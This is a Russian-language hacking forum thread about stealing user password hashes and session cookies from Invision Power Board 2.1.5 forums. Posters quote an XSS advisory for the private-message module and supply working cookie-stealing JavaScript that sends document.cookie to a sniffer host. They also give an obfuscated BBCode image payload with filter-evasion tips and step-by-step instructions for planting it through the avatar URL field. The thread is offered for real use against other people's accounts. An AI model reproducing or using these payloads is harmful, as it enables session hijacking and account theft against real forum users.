Вобшем как можно унать хэш на это версии движка, помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.
Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто. Можно через аватарку попробовать вроде бы. Но это только под Ie.
Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. P.S.: В инете искать пробовали?
тебе ввобщем надо получить куки припомощи JavaScript. вот пример: <script> img = new Image(); img.src = "http://адресс_снифера?"+document.cookie; </script> только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)
Не понял вместо XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу ???
Попробал вот это и вот что мне выдал Sorry, dynamic pages in the tags are not allowed вместо знака вопроса пробавл вот это %3F затем ? и это ?
Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы: " пробел ; ' + ? возможно еще [ ] Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)
Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук: Code: [im*g]j a v a s c r i p t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/im*g] пояснение: 1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел. 3)Этот код пашет токо под ИЕ. 4)Убираем звездочки только с тегов ПС просьба репу добавлять CinerX, а не _CinerX
Для Ipb 2.1.5: Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =) ПС репу поднимаем CinerX, а не _CinerX